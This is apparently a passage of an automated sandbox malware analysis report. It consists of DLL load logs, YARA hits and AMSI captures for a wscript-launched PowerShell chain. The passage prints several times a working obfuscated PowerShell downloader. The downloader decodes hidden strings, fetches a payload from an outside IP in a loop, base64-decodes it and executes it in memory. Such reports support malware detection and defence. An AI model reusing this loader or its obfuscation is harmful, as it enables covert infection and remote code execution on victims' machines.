              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2310028531.0000000007210000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb01O source: powershell.exe, 00000007.00000002.2310028531.0000000007302000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2310028531.0000000007302000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb"` source: powershell.exe, 00000007.00000002.2310028531.0000000007210000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.2310028531.000000000722E000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("PowerShell.exe", ""$Bastanteresba = 1;$Excerptet='Substri", "", "", "0");
              Source: Yara matchFile source: 00000007.00000002.2315989760.0000000009092000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2315688499.0000000008610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2397266995.000001E3D03D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2306786196.00000000059B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Praelector)$global:Maegbot = [System.Text.Encoding]::ASCII.GetString($Fijianeres)$global:Reconciliations=$Maegbot.substring(318486,24942)<#Conutrition Robinton Undaintily Matchens #>
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Nonpersecutive $Lowa $Gletscheren), (Bjldeindstillinger @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Preflavouring = [AppDomain]::CurrentDomain.GetAssem
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Securitan)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Eyewink, $false).DefineType($Cleidomastoid, $Fa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Praelector)$global:Maegbot = [System.Text.Encoding]::ASCII.GetString($Fijianeres)$global:Reconciliations=$Maegbot.substring(318486,24942)<#Conutrition Robinton Undaintily Matchens #>
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA540B9 pushad ; iretd 1_2_00007FFD9BA540F9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA5660D pushad ; iretd 1_2_00007FFD9BA56651
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA52617 pushad ; iretd 1_2_00007FFD9BA52621
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA50018 pushad ; iretd 1_2_00007FFD9BA50019
